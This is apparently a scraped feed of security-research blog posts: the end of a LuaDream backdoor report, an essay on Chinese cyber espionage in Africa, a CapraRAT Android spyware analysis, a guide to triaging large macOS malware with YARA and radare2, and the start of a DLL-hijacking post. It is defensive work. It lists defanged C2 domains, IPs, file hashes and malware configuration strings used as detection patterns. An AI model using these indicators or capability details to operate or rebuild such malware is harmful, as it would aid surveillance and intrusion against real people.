The thread_recv component handles incoming messages and its main purpose is to manage attacker-provided plugins that extend LuaDream. Some functionalities of this component include:

  • taking LuaDream offline (command offline);
  • loading, executing (command loadplugin), unloading (command unloadplugin), and saving plugins (command saveplugin);
  • executing an attacker-specified plugin functionality.

LuaDream maintains a key-based list of plugin information, which includes the handle and the ID of the thread in which the plugin runs, and a plugin-identifying key. Loading of a plugin involves inserting a new entry in this list and executing plugin code in a designated thread. For communicating with plugins, LuaDream leverages inter-thread communication, using the message 1234 for executing plugin functionalities.

LuaDream plugin list (from decompiled LuaJIT bytecode)
LuaDream plugin list (from decompiled LuaJIT bytecode)

Our analysis of LuaDream staging samples shared on VirusTotal revealed the existence of two additional components named main_proto_WinHttpServer and thread_test. main_proto_WinHttpServer implements a LuaDream capability to listen for incoming connections based on the Windows HTTP server API. thread_test implements functions for testing the loadplugin and saveplugin commands. These functions indicate the existence of a plugin named cmd, whose name suggests command execution capabilities.

cmd plugin references
cmd plugin references

Network Infrastructure

The LuaDream samples we analyzed communicate with the C2 servers ssl.explorecell[.]com and mode.encagil[.]com. ssl.explorecell[.]com is a Tucows-registered domain with a first-seen resolution date of March 2023. This domain last resolved to 185.82.218[.]230, an IP address of a server hosted in Bulgaria by the ITLDC hosting provider.

mode.encagil[.]com is an Arsys-registered domain with a first-seen resolution date of August 2023. The domain last resolved to 172.67.173[.]208 and 104.21.47[.]226, IP addresses of a server hosted behind a major load balancing platform. The shift from using a directly exposed C2 server IP address to addresses of a load balancing infrastructure marks a change in Sandman’s infrastructure management practices – likely to avoid exposing the true hosting location.

Examination of C2 netflow data revealed lack of comprehensive C2 infrastructure segmentation, with several LuaDream deployments at geographically dispersed victim environments communicating with the same C2 server.

Conclusions

Attributing Sandman remains a mystery, placing it in the same enigmatic category as Metador and other elusive threat actors who operate with impunity. LuaDream stands as a compelling illustration of the continuous innovation and advancement efforts that cyber espionage threat actors pour into their ever-evolving malware arsenal.

Navigating the shadows of the threat landscape necessitates consistent cooperation and information sharing within the threat intelligence research community. SentinelLabs remains dedicated to this mission and hopes that this publication will serve as a catalyst for further collaborative efforts. We are grateful for the contributions of Luca Palermo from the SentinelOne EMEA IR TAM team, who assisted with the initial investigations and remediation of the threat.

Indicators of Compromise

SHA1 File name
1cd0a3dd6354a3d4a29226f5580f8a51ec3837d4 fax.dat
27894955aaf082a606337ebe29d263263be52154 fax.Application
5302c39764922f17e4bc14f589fa45408f8a5089 ualapi.dll
77e00e3067f23df10196412f231e80cec41c5253 fax.cache
b9ea189e2420a29978e4dc73d8d2fd801f6a0db2 UpdateCheck.dll
fb1c6a23e8e0693194a365619b388b09155c2183 updater.ver
ff2802cdbc40d2ef3585357b7e6947d42b875884 fax.module

LuaDream Folder File paths
%ProgramData%\FaxConfig
%ProgramData%\FaxLib

C2 Server Domains
mode.encagil[.]com
ssl.explorecell[.]com

Cyber Soft Power | China’s Continental Takeover

By: Tom Hegel
21 September 2023 at 17:00

Executive Summary

  • SentinelLabs observes sustained tasking towards strategic intrusions by Chinese threat actors in Africa, designed to extend influence throughout the continent.
  • New attacks include those against telecommunication, finance and government, attributed to the BackdoorDiplomacy APT and the threat group orchestrating Operation Tainted Love.
  • China’s engagement in soft power diplomacy has a lengthy history, yet the use of strategic cyber intrusions highlights recent objectives and potential lasting impact in Africa.
  • To better manage the challenge of tracking state-aligned cyber activities in less monitored areas like Africa and Latin America, we are announcing the formation of the ‘Undermonitored Regions Working Group’. Launched today at LABScon, this effort calls upon established security researchers to join analytic capabilities, combine telemetry, resources, and local expertise, and promote a unified approach to analyzing cyber operations used to support soft power agendas in Africa and Latin America.

Introduction

In the evolving cyber threat landscape, it’s always important to constantly challenge our biases. There are large pockets of important threat activity occurring in regions around the world less commonly addressed in Western threat research. While much attention has rightfully been drawn to Chinese threat actors targeting the West, the broader set of global activity supporting and promoting similar interests remains opaque. At a time of pervasive foreign activities towards cornering natural resources and co-opting the governance of less represented countries, we have to ask– what is happening across the vast African continent?

As we contemplate where China might stand in the global arena in the next 5 to 10 years, it’s evident that there exists a considerable gap in the realm of cyber threat intelligence with regards to Africa as a whole, and more specifically how it ties into the long term agenda of the People’s Republic of China (PRC). Africa, with its highly complex and dynamic environment, poses a unique challenge for accurately characterizing its cyber threat landscape.

In the threat intelligence industry, we have a habit of overlooking regions where our immediate financial interests don’t appear to be at stake. Yet, it is precisely in places like Africa and Latin America that we witness these threat actors subtly shifting the balance of negotiations and playing pivotal roles in larger geopolitical strategies. There’s an urgent need to acknowledge the importance of these frequently overlooked regions in the global threat landscape and take radical steps to close the gap in our situational awareness. These regions are shaping up to be the battlegrounds of the future.

Our focus is on incentivizing strategic intelligence on the state of cyber operations targeting Africa. We recognize that these operations need to be placed in the greater context of multidimensional campaigns that include more traditional forms of espionage, market maneuvers, and influence. This is vital in understanding the PRC’s geostrategic ambitions and technological investments, and are fundamental in forging a forward-thinking and holistic defense approach. We’ll highlight key examples including the targeting from Chinese state-sponsored APTs, such as Op. Tainted Love and BackdoorDiplomacy, and how they blend into PRC’s soft power agenda across Africa.

Background on Soft Power Engagement

While cyber capabilities are important, they are just one of the more recent tools used in implementing broad national soft power strategies. Spanning several decades, China’s involvement in the continent has adapted to embrace economic, political, and cultural dimensions that represent both comprehensive and strategic opportunities. The establishment of Confucius Institutes and expanding media investments have been a tool in crafting narratives that underline the positive aspects of its engagement in Africa.

China has engaged in significant strategic investments in Africa, considered ‘debt-trap diplomacy’. This refers to a scenario where a creditor country extends excessive credit to a debtor country with the presumed intention of extracting economic or political concessions when the debtor country cannot meet its repayment terms.

Specifically in Africa, China has financed large critical infrastructure projects in many African countries. Countries pursuing economic and infrastructure development have found China a willing and eager investor over the last decade. Future adverse effects are easily brushed aside by the immediate perceived benefits of these investments.

Offensive Cyber Operations as a Support Tool of Soft Power Agendas

In recent years, we have tracked targeted intrusions against key industrial sectors in various African nations. These attacks conspicuously align with China’s broader soft power and technological agenda in the region, focusing on critical areas such as the telecommunication sector, financial institutions, and governmental bodies. Three significant sets of activity best exemplify this dynamic across the larger set of China-aligned activity in Africa.

Operation Tainted Love

In March 2023, we shared details of Operation Tainted Love, a case centered on targeted attacks against telecommunications providers predominantly located in the Greater Middle East region. This discovery marked an evolution of the toolkit involved in Operation Soft Cell, forging immediate connections to previous China-attributed activities.

From Operation Tainted Love, we highlighted the use of a rigorously maintained and version-controlled system for credential theft, accompanied by a novel dropper mechanism. The overall findings are suggestive of a concerted development effort undertaken by a threat actor, or threat actors support structure, driven by specific objectives.

Operation Tainted Love

Unnoted in our initial report, we identified the compromise of a telecommunications entity based in North Africa by the same threat actor. The timing of this activity aligned closely with Chinese telecommunication soft power interests in Africa, as the organization was in private negotiations for further regional expansion in areas. Strategic objectives in such intrusions highlight interest from China in internal business knowledge on negotiations, providing competitive advantage, or prepositioning for retained technical access for intelligence collection.

Backdoor Diplomacy

For several years, another APT primarily referred to as BackdoorDiplomacy has operated across Africa. Recently, fresh revelations emerged spotlighting the group’s sustained three-year endeavor targeting governmental organizations in Kenya. Delving into prior public technical reports by ESET, Unit42, and BitDefender unveils a targeting paradigm bearing resemblance to those employed in Operation Tainted Love.

BackdoorDiplomacy seemingly concentrates efforts on government entities, along with high-priority telecommunications and finance organizations. The group has orchestrated a series of notable espionage campaigns across Africa in recent years. Through analysis of infrastructure tied to this actor, we assess multiple African countries are experiencing targeting over the last few years, including at least South Africa, Kenya, Senegal, and Ethiopia. As noted by previous reporting, the threat actor does maintain operations throughout the middle east, and can be found in other regions of particular PRC interest.

Our current perspective suggests a close relationship between BackdoorDiplomacy and another Chinese state sponsored threat actor, APT15.

Threat Actors Ambiguity

A broader set of China-aligned campaigns has been active across Africa, as emphasized by recent reports on FamousSparrow and Earth Estries. Pinpointing precise clustering for these groups remains challenging due to a prevalence of shared technical resources. However, TTPs and targeting objectives are somewhat related to the APT41 umbrella.

In a separate case, Chinese espionage efforts against the African Union (AU) was allegedly discovered in 2017. According to initial reports, for a period of five years, from 2012 to 2017, the Chinese government maintained backdoor access into servers for the African Union’s headquarters in Ethiopia. The $200 million dollar headquarters was funded and built by China between 2009 and 2012. Notably, the network infrastructure and services were reportedly Huawei technology since the initial construction.

African Union Headquarters, Addis Ababa

More recently in 2020, Japan’s CERT notified AU IT staff of an intrusion they attributed to the Bronze President APT, a separately tracked Chinese threat actor. In this intrusion, Bronze President was observed exfiltrating surveillance footage from the AU headquarters facility. This case may highlight how much of a real priority intelligence inside the AU is to Beijing, ultimately forcing their hand on moving away from backdoored equipment to performing actual intrusions through well tracked APTs.

In both the 2017 and 2020 case, African Union and Chinese officials denied any sort of intrusions. As quoted by Reuters, a former AU official told them “Attacking the Chinese, for us, it’s a very bad idea,”. A review of specifics around China’s technological soft power in Africa highlights some reasons why the official may have said that.

Technological Soft Power, Reliance, and Abuse Opportunities

The digital landscape of Africa has undergone a seismic transformation, largely facilitated through Chinese tech giants deploying extensive resources to meet the continent’s critical technological needs.

China has taken a lead role in Africa’s telecommunication, finance, and surveillance technology sectors. This initiative ties into China’s Digital Silk Road project, announced in 2015.

Telecommunication Networks

At the forefront of technology investment in Africa are Huawei and ZTE, powerhouses steering efforts to bridge the connectivity divide separating urban and rural landscapes of the continent. These corporations have brought the boon of digital connectivity to the remotest corners of Africa.

In the two decades since Huawei began expanding into Africa, it has grown to become the leading telecommunication technology and service provider across much of the continent.

Yet, underneath the altruistic veneer may lie a strategy anchored on fostering an overwhelming dependence on Chinese technology. Through a sweeping range of initiatives that span from mobile networks to broadband infrastructure, the strategy envisions a society deeply tied to China’s digital ecosystem, guiding future socio-political paths and holding significant sway over personal freedoms.

This rise isn’t merely a route to economic enrichment; it empowers China to shape policies and narratives aligned with its geostrategic ambitions, establishing itself as a pivotal and defining force in Africa’s digital evolution.Targeted intrusions by the BackdoorDiplomacy APT and the threat group orchestrating Operation Tainted Love indicate a level intention directed at supporting such agendas.

Instances of infringement on internet rights and the misuse of technology are already evident in countries such as Sudan, Ethiopia, Zimbabwe, Gabon, and the Democratic Republic of Congo. In some of these nations, the governments have resorted to shutting down social media and internet services as a strategy to suppress civil unrest, or even spying on the network communications of its citizens.

China has also ventured to enhance its command over the underwater fiber networks connected to the African continent. Leveraging significant investments in projects such as the PEACE cable initiative, China has been laying cables that aim to rejuvenate Africa’s digital connectivity, ostensibly offering the continent much needed information accessibility.

Peace Cable Map, TeleGeography
Peace Cable Map, TeleGeography

These underwater pathways hold enormous significance in dictating the flow of information between continents. In taking ownership of them, China stands in a position to potentially orchestrate and steer digital dialogues on the African continent, forging a narrative that aligns seamlessly with its geopolitical objectives.

Controlling these undersea networks gives China the capacity to monitor the data flowing through them, raising serious concerns regarding data privacy and national sovereignty. To gauge the potential for misuse, we only need to examine how China manages its own domestic networks, offering a window into the possible ramifications of granting them such control.

Mobile Payment Platforms

In recent years, digital mobile banking platforms like M-Pesa have revolutionized Africa’s financial landscape, promoting unprecedented financial inclusion especially in areas underserved by traditional banks. With 51 million users processing over $314 billion in transactions annually, its footprint is substantial.

M-Pesa has since been migrated to Huawei’s Mobile Money Platform. Similarly, China-backed entities OPay and PalmPay have seized a considerable market share, facilitating a large portion of the continent’s financial transactions.

This should raise apprehensions around the nature of China’s influence, with potential avenues for financial monopolies and the control it gives to Chinese stakeholders in the dictation of economic trajectories across the African continent.

The intensive data mining, user surveillance, and user disruption that are characteristic of Chinese tech giants present a significant risk of exploitation, infringing upon the privacy rights of individuals and potentially undermining the sovereignty of African nations. The depth and breadth of data these platforms can amass and control raise serious concerns about how it might be utilized, perhaps to shape consumer behavior, influence public opinion, or even foster dependencies that go beyond financial transactions.

While services offered by these platforms are undeniably bringing about a financial revolution, it’s creating a scenario where a foreign power has an overwhelming influence over the financial stability, habits, and preferences of a significant portion of the African populace. Financial inclusion and potential manipulation hang in a precarious balance, necessitating a critical appraisal of the long-term implications of this growing influence.

Surveillance

Huawei’s Smart City venture is also emerging as a central pillar in China’s escalating soft power influence in Africa. This initiative pivots on a suite of surveillance services including facial recognition, artificial intelligence, data analytics, and 5G network deployments, all purportedly claimed to enhance urban management, augment public safety, and spur economic development. Yet, the flipside of this technological investment is the possibility of a surveillance era of unparalleled scope, exploiting a diverse array of data from daily life to cultivate a society where personal privacy could soon become obsolete.

Across Africa, nations like Kenya, Mauritius, Uganda, and Zambia have embraced Huawei, infusing surveillance technology into the heartbeat of their urban landscapes. In Kenya, the Safe City project — powered by Huawei’s system encompassing CCTV and facial recognition technologies — monitors Nairobi and other primary cities. In Uganda, one such case of surveillance reportedly led to the regime seeking to silence political opponent Bobi Wine, accomplished through the help of Huawei staff and services. These same capabilities can be found in many other countries throughout Africa.

Bobi Wine, source: Bloomberg
Bobi Wine, source: Bloomberg

Other noteworthy activity includes the Chinese business CloudWalk Technology providing facial recognition surveillance technology to Zimbabwe. CloudWalk has been accused of being involved in human rights violations and transgressions perpetrated during China’s campaign targeting Uighurs, ethnic Kazakhs, and other Muslim minority groups in the Xinjiang Uighur Autonomous Region. This campaign is characterized by widespread repression, indiscriminate detentions, enforced labor, and intensive high-tech surveillance.

Once these smart cities come to fruition, they will operate fundamentally on Chinese technology, often granting Beijing real-time insights into these nations, lacking consequences for personal privacy and national safeguarding measures. Moreover, these nations steer towards further reliance on Chinese expertise and technical resources for the use and administration of these systems into the future.

A Force for Good

African nations face the delicate task of leveraging Chinese tech innovations while preserving their autonomy and digital rights, a tightrope walk exacerbated by limited alternatives. Concurrently, it’s imperative for the cybersecurity community to deepen our understanding of China’s cyber activities in Africa to prevent unwanted encroachment.

Due to escalating cyber threats in overlooked areas such as Africa and Latin America, we are launching the Undermonitored Regions Working Group (URWG). This initiative is focused on addressing the unique cybersecurity hurdles faced in these regions, frequently sidelined in mainstream global cyber discussions.

Our mission transcends geographical boundaries as we track state-sponsored threats emerging globally from nations be it China, Russia, or Egypt. We are determined to cultivate a technical research collaboration, harnessing our collective expertise to identify new threats, and devise effective countermeasures against them.

SentinelLabs embodies our commitment to sharing openly – providing tools, context, and insights to strengthen our collective mission of a safer digital life for all. We are seeking out security researchers, intelligence analysts, and those passionate about understanding and improving the cyber threat narrative to grow these efforts through unconventional means. By pooling our knowledge and technical prowess, we strive to nurture a digital future in support of less monitored parts of the world.

Conclusion

As we have navigated through the complexities of Chinese influence in Africa, the role of offensive cyber actions, and the broader implications of tech dominance, it becomes evident that this intricate web of geopolitics and cyber threats demands attention across the cybersecurity industry.

Recognizing Africa’s centrality in the future of global cyber dynamics helps not only the safeguarding of the continent’s digital freedoms but fortifies the global ecosystem against sophisticated threat actors.

The story of Africa’s digital landscape today is, in essence, the precursor to the global narrative of tomorrow. We should work in tandem to craft it as one of security, prosperity, and shared progress.

CapraTube | Transparent Tribe’s CapraRAT Mimics YouTube to Hijack Android Phones

18 September 2023 at 13:00

Executive Summary

  • SentinelLabs identified three Android application packages (APK) linked to Transparent Tribe’s CapraRAT mobile remote access trojan (RAT).
  • These apps mimic the appearance of YouTube, though they are less fully featured than the legitimate native Android YouTube application.
  • CapraRAT is a highly invasive tool that gives the attacker control over much of the data on the Android devices that it infects.

Background

Transparent Tribe is a suspected Pakistani actor known for targeting military and diplomatic personnel in both India and Pakistan, with a more recent expansion to the Indian Education sector. Since 2018, reports have detailed the group’s use of what is now called CapraRAT, an Android framework that hides RAT features inside of another application. The toolset has been used for surveillance against spear-phishing targets privy to affairs involving the disputed region of Kashmir, as well as human rights activists working on matters related to Pakistan.

Transparent Tribe distributes Android apps outside of the Google Play Store, relying on self-run websites and social engineering to entice users to install a weaponized application. Earlier in 2023, the group distributed CapraRAT Android apps disguised as a dating service that conducted spyware activity.

One of the newly identified APKs reaches out to a YouTube channel belonging to Piya Sharma, which has several short clips of a woman in various locales. This APK also borrows the individual’s name and likeness. This theme suggests that the actor continues to use romance-based social engineering techniques to convince targets to install the applications, and that Piya Sharma is a related persona.

CapraRAT is a comprehensive RAT that provides the actors with the ability to harvest data on demand and exfiltrate it. Notable features include:

  • Recording with the microphone, front & rear cameras
  • Collecting SMS and multimedia message contents, call logs
  • Sending SMS messages, blocking incoming SMS
  • Initiating phone calls
  • Taking screen captures
  • Overriding system settings such as GPS & Network
  • Modifying files on the phone’s filesystem

App Analysis

CapraRAT is distributed as an Android APK. When the tool was initially named by Trend Micro, their research team noted that CapraRAT may be loosely based on the AndroRAT source code.

We performed static analysis on two YouTube-themed CapraRAT APKs: 8beab9e454b5283e892aeca6bca9afb608fa8718 – yt.apk, uploaded to VirusTotal in July 2023. 83412f9d757937f2719ebd7e5f509956ab43c3ce – YouTube_052647.apk, uploaded to VirusTotal in August 2023. We also identified a third APK called Piya Sharma, the YouTube channel persona described earlier: 14110facecceb016c694f04814b5e504dc6cde61 – Piya Sharma.apk, uploaded to VirusTotal in April 2023

The yt and YouTube APKs apps are disguised as YouTube, borrowing the YouTube icon.

Applications icons on an Android device, including YouTube_052647.apk
Applications icons on an Android device, including YouTube_052647.apk
Application icons, including the Piya Sharma app
Application icons, including the Piya Sharma app
YouTube_052647.apk displays the YouTube website when launched
YouTube_052647.apk displays the YouTube website when launched

The app requests several permissions. YouTube is an interesting choice for masquerading the app: some permissions, like microphone access, make sense for recording or search features. Other permissions–like the ability to send and view SMS–are less relevant to the expected app behaviors.


Permissions prompts during install of the weaponized YouTube app
Permissions prompts during install of the weaponized YouTube app

Installation permissions requested by the Piya Sharma APK
Installation permissions requested by the Piya Sharma APK

When the app is launched, MainActivity’s load_web method launches a WebView object to load YouTube’s website. Because this loads within the trojanized CapraRAT app’s window, the user experience is different from the native YouTube app for Android and akin to viewing the YouTube page in a mobile web browser.

Smali snippet of the load_web method in MainActivity
Smali snippet of the load_web method in MainActivity

Key Components

Because CapraRAT is a framework inserted into a variety of Android applications, the files housing malicious activity are often named and arranged differently depending on the app. The CapraRAT APKs we analyzed contain the following files:

Name yt.apk
Configuration com/media/gallery/service/settings
Version MSK-2023
Main com/media/gallery/service/MainActivity
Malicious Activity com/media/gallery/service/TPSClient
Name YouTube_052647.apk
Configuration com/Base/media/service/setting
Version A.F.U.3
Main com/Base/media/service/MainActivity
Malicious Activity com/Base/media/service/TCHPClient
Name Piya Sharma.apk
Configuration com/videos/watchs/share/setting
Version V.U.H.3
Main com/videos/watchs/share/MainActivity
Malicious Activity com/videos/watchs/share/TCPClient

CapraRAT’s configuration file, which is named interchangeably setting or settings, holds the default configuration information, as well as metadata like versioning. The CapraRAT version syntax seen in YouTube_052647.apk and Piya Sharma.apk–A.F.U.3 and V.U.H.3, respectively–matches the convention used to track Transparent Tribe’s Windows tool, CrimsonRAT. However, there is no tangible relationship between these version numbers and the C2 domains as we saw in CrimsonRAT.

Thanks to creative spelling and naming conventions, the RAT’s configuration provides consistent static detection opportunities, with each of the following present in the samples from earlier in 2023 as well:

 	is_phical
 	isCancl
 	isRealNotif
 	SERVERIP
 	smsMoniter
 	smsWhere
 	verion

MainActivity is responsible for driving the application’s key features. This activity sets persistence through the onCreate method which uses Autostarter, an open-source project with code that lets developers automatically launch an Android application. The TPSClient class is initialized as an object called mTCPService; then, this method calls the serviceRefresh method, which creates an alarm at the interval specified in the settings file’s timeForAlarm variable. In this example, the value 0xea60 is equal to 60,000 milliseconds, meaning the alarm and persistence launcher run once per minute.

The RAT’s core functionality is in an activity similar to the Extra_Class activity from the March 2023 samples reported by ESET. Henceforth, we call this activity TPSClient for simplicity. These files are rather large, decompiling to over 10,000 lines of Smali code. By comparison, the March versions’ equivalents have only about 8,000 lines.

TPSClient contains CapraRAT’s commands, which are invoked through the run method via a series of switch statements that map the string command to a related method.

The smsmons command logic inside the run method of TPSClient
The smsmons command logic inside the run method of TPSClient

Many of these commands have been documented in previous research, though there are several changes in these new versions. The hideApp method now checks if the system is running Android version 9 or earlier and if the mehiden variable in the setting(s) config file was set to False; if applicable, the app will be hidden from the user’s view. While similarities between CapraRAT and AndroRAT are seemingly minimal at this point in CapraRAT’s development, the AndroRAT source code documentation notes that the tool becomes unstable after Android version 9, so there are likely underlying changes to the OS that make this method behave differently depending on the OS version.

TPSClient has a method check_permissions() that is not in Extra_Class. This method checks the following series of Android permissions and generates a string with a True or False result for each:

  • READ_EXTERNAL_STORAGE
  • READ_CALL_LOG
  • CAMERA
  • READ_CONTACTS
  • ACCESS_FINE_LOCATION
  • RECORD_AUDIO
  • READ_PHONE_STATE

Interestingly, some other older versions contain this method, suggesting that the samples may be tailored for targets or are potentially developed from different branches.

C2 & Infrastructure

In CapraRAT’s configuration file, the SERVERIP variable contains the command-and-control (C2) server address, which can be a domain, IP address, or both. The C2 port is in hexadecimal Big Endian format; the human readable port can be obtained by converting into decimal, resulting in port 14862 for yt.apk, port 18892 for YouTube_052647.apk, and port 10284 for Piya Sharma.apk.

C2 configuration from yt.apk (left) and YouTube_052647.apk (right)
C2 configuration from yt.apk (left) and YouTube_052647.apk (right)

The shareboxs[.]net domain used by YouTube_052647.apk has been associated with Transparent Tribe since at least 2019. Interestingly, the ptzbubble[.]shop domain was registered the same week of ESET’s report outlining the group’s Android apps that leveraged other C2 domains.

The IP addresses associated with C2 from the two YouTube samples have Remote Desktop Protocol port 3389 open with the service identified as Windows Remote Desktop, indicating the group uses Windows Server infrastructure to host the CapraRAT C2 application. The Piya Sharma app’s C2 IP, 209[.]127.19.241, has a certificate with common name value WIN-P9NRMH5G6M8, a longstanding indicator associated with Transparent Tribe’s CrimsonRAT C2 servers.

84[.]46.251.145–the IP address hosting ptzbubble[.]shop domain–shows historical resolutions associated with Decoy Dog Pupy RAT DNS tunneling lookups. Any connection between these campaigns is unclear; it is plausible that a service hosted on this IP was infected by that campaign. Based on the query dates, the claudfront[.]net lookup was during the time the CapraRAT actor was using this IP address to host ptzbubble[.]shop, while a lookup to allowlisted[.]net was in December 2022, which was potentially before this actor started using the IP.

Resolution history for IP hosting ptzbubble[.]shop, 84[.]46.251.145
Resolution history for IP hosting ptzbubble[.]shop, 84[.]46.251.145

Conclusion

Transparent Tribe is a perennial actor with reliable habits. The relatively low operational security bar enables swift identification of their tools.

The group’s decision to make a YouTube-like app is a new addition to a known trend of the group weaponizing Android applications with spyware and distributing them to targets through social media.

Individuals and organizations connected to diplomatic, military, or activist matters in the India and Pakistan regions should evaluate defense against this actor and threat.

Defensive and preventative measures should include:

  • Do not install Android applications outside of the Google Play store.
  • Be wary of new social media applications advertised within social media communities.
  • Evaluate the permissions requested by an application, particularly an application you are not particularly familiar with. Do these permissions expose you to more risk than the potential benefit of the app?
  • Do not install a third-party version of an application already on your device.

CapraRAT malware is fully detected by SentinelOne’s Singularity Mobile solution.

Indicators of Compromise (IOC)

Files Hashes – SHA1
14110facecceb016c694f04814b5e504dc6cde61 – Piya Sharma APK
83412f9d757937f2719ebd7e5f509956ab43c3ce – CapraRAT, YouTube_052647.apk
8beab9e454b5283e892aeca6bca9afb608fa8718 – CapraRAT, yt.apk

C2 Network Communications
newsbizshow.net
ptzbubble.shop
shareboxs.net

95[.]111.247.73
209[.]127.19.241

Bloated Binaries | How to Detect and Analyze Large macOS Malware Files

29 August 2023 at 13:48

It wasn’t so long ago that malware authors, much like software developers, were concerned about the size of their code, aiming to keep it as small and compact as possible. Small binaries are less noticeable and can be slipped inside other files or shipped in benign code, attachments and even images. Smaller executables take up less space on disk, are faster to transfer over the wire, and – if they’re written efficiently – can execute their malicious instructions with less tax on the host CPU. In days of small disk drives, slow network connections and underpowered chips, such concerns made good sense and helped malware to avoid detection.

In today’s computer environments, however, storage, bandwidth and processor power are rarely in short supply, and as a result both legitimate programs and malware have increased greatly in size.

While malware executables of several megabytes are now so common they are hardly worthy of mention, some recent malicious programs have taken the invitation to bloat to a new extreme. Malware binaries weighing in at 50MB or more are now widely in use by macOS malware authors, and binaries over 100MB can also be found in some campaigns, typically those involving cryptominers. Such massive file sizes can cause detection problems for some kinds of AV solutions and create triage and reversing challenges for malware analysts.

In this post, we dig into the phenomenon of massive malware binaries on macOS, explaining why they are becoming more common, the problems they cause for detection and analysis, and how defenders can successfully deal with them.

How Widespread are Large macOS Malware Binaries?

It is possible to get a feel for how common large malicious binaries are by hunting in public malware repositories like VirusTotal and filtering by size. For example, if we search for Mach-O binaries over 35MB recognized as malware by 5 or more vendors, the search today returns 524 hits.

Increasing the file size to 50MB or more returns 113 hits, with many of the files returned being samples of Atomic Stealer.

Malicious mach-O files over 50Mb (Source: VirusTotal)
Malicious mach-O files over 50Mb (Source: VirusTotal)

Around 7 samples in the 75MB and 100MB size range are examples of OSX.EvilQuest malware. Adjusting our search for file sizes of 100MB returns over 20 files with five or more vendors detecting as malware; many of these are miners, including a coinminer executable weighing in at 345 MB.

A macOS malware executable over 300MB (Source: VirusTotal)
A macOS malware executable over 300MB (Source: VirusTotal)

However, the problem is wider than just those files that vendors currently recognize as malware. Both detection solutions and analysts have to determine whether an unknown sample is suspicious or malicious, and if we look at the number of Mach-O binaries on VT in general that are over 35MB, we find almost 100,000 samples, with the number of samples over 100MB currently at almost 50,000.

(Source: VirusTotal)

We can even find a single Mach-O binary on VirusTotal with a file size of 600MB. Are there individual binaries larger than that? Almost certainly, but VirusTotal has a file size upload limit of 650MB, so above that we have a data blindspot for both legitimate and malicious files.

From the data we do have, it is clear large executables are a widespread phenomenon, but why are threat actors turning to bloated binaries and what problems do they cause for enterprise security?

Why Are Threat Actors Turning to Supersized Binaries?

There are a number of reasons why threat actors may choose to distribute malware in oversized binaries. Some large binaries such as cryptominers like BirdMiner (aka LoudMiner) are a result of bundling emulation environments such as QEMU in the malware.

Samples of LoudMiner containing the Linux QEMU emulation environment
Samples of LoudMiner containing the Linux QEMU emulation environment

Other large binaries are caused by using cross-platform programming languages like Go and Rust. In order to ensure these programs will run on the intended platform, the runtime, libraries and all other dependencies are compiled into the final payload.

In addition, Apple’s switch to ARM from Intel has resurrected the Universal/FAT binary format, in which two architectures are now compiled into a single binary to ensure that the same program will work regardless of whether the user runs it on an Intel Mac or an Apple silicon Mac. Any binary compiled into the Universal format is effectively doubled in size.

As we shall see in the next section, in some cases threat actors may simply bloat files with junk code to defeat file scanners with file size limits or to thwart analysis by malware researchers.

What Problems Do Outsized Binaries Cause For Detection and Analysis?

Massive individual binaries are a relatively recent phenomenon and they cause a headache for traditional AV scanners that rely on either computing a file’s hash or scanning it for malicious content. The larger the binary the longer it takes to scan, and when scanning across numerous files on a file system, the end result can be a sluggish, unresponsive system as the AV software increasingly hogs the host CPU to complete its task.

The performance problems associated with file scanning are historically one of the most oft-cited reasons for complaints from users and something that the industry has attempted to solve in various ways.

One typical solution employed by many AV scanners is to limit the maximum file size the scanner will accept. In the days when few legitimate programs reached more than 20MB that may have seemed like an acceptable compromise, but given today’s bloated binaries, that’s clearly no longer viable: it would mean that a lot of known malware would go undetected. Threat actors have even been known to bloat files with junk code precisely to defeat file size limits of scanners and malware repositories like VirusTotal, which as we noted above has a max file size upload limit of 650MB.

Massive files are not just a problem for detection software, but also for researchers, reverse engineers and malware analysts. With tens of megabytes of code to analyze, most of which is benign, junk or part of a standard runtime like Go, analysts can have a difficult time identifying exactly which parts of a binary are malicious. This can hamper efforts to find other, possibly undetected, malware samples using the same or similar code and allow threat actors to extend their campaigns without detection.

How to Detect Malware Hidden Inside Massive Binaries

Fortunately, there are solutions to the problem of massive binaries both for detection and analysis. The problems inherent in relying solely on file scanning have been well understood by vendors such as SentinelOne and were part of the paradigm shift that caused such solutions to adopt behavioral detection.

In contrast to a file scanning engine, a behavioral engine examines what a binary does when it is executed rather than examining the file’s content prior to execution. A behavioral approach allows a solution to avoid scanning large amounts of files or files of large sizes and instead determines whether an execution process is involved in malicious activity. Solutions like SentinelOne can thus detect and kill malware regardless of how it is packaged or how large the file is.

Security software that combines multiple detection mechanisms including behavioral and machine learning detection engines is now the standard for enterprise security.


SentinelOne’s Behavioral Engine Detecting Atomic Stealer
SentinelOne’s Behavioral Engine Detecting Atomic Stealer

How to Analyze Large macOS Malware Binaries

Large binaries present malware analysts with a number of challenges. In this section, we will briefly describe a useful technique for finding interesting code among hundreds of thousands of lines of disassembly leveraging YARA and radare2.

Threat hunters are most familiar with using YARA to determine if a sample file contains strings or bytes similar to other known malware families, but we can also use the same technique to find interesting code typical of malware TTPs. Take the following YARA rule, for example:

This rule returns a match if the binary contains certain strings related to disabling or modifying tools or other processes on a device, a typical anti-analysis and evasion technique. We can create a list of rules with various TTP indicators to help us to statically determine what capabilities a file has that may be related to malware behavior. Here is another example of a rule to indicate a binary that contains code related to system discovery.

We can run our YARA rule set on a given binary from within a radare2 session and, by leveraging YARA’s -m and -s switches, obtain a list of possible TTPs and their offsets for further investigation.

Possible TTPs of Malware sample 1909e84ac796730b119c44c676a730e09fce5ded
Possible TTPs of Malware sample 1909e84ac796730b119c44c676a730e09fce5ded

In this example we create a radare2 alias to run our YARA TTP ruleset over the file. The alias is equivalent to the command:

yara -ms ttp.yara 

In radare2, the alias can be defined locally within the current r2 session or more usefully as a global alias in the .radare2rc config file as:

(ttp x;  !yara -$0w <path to>/ttp.yara `o.`)

We provide a starter YARA rule set here that other macOS malware analysts can use as a base from which to develop their own more comprehensive ttp.yara file.

A starter rule set for statically detecting macOS malware TTPs
The SentinelLabs starter rule set for statically detecting macOS malware TTPs

Conclusion

Massive binaries are becoming increasingly common on the macOS platform and defenders need strategies for dealing with them. Malware authors have embraced the idea of distributing huge binaries in part as a tactic for defense evasion and anti-analysis and in part as a result of turning to cross-platform languages that pack a runtime, library and other dependencies in the final payload.

Organizations can detect large malicious binaries by turning to solutions that include behavioral detection and do not rely solely on file scanning. Analysts can implement techniques such as those discussed above to help them triage massive macOS malware samples faster and more efficiently.

YARA Rule set

https://github.com/SentineLabs/macos-ttps-yara

Chinese Entanglement | DLL Hijacking in the Asian Gambling Sector

17 August 2023 at 09:55

By Aleksandar Milenkoski and Tom Hegel

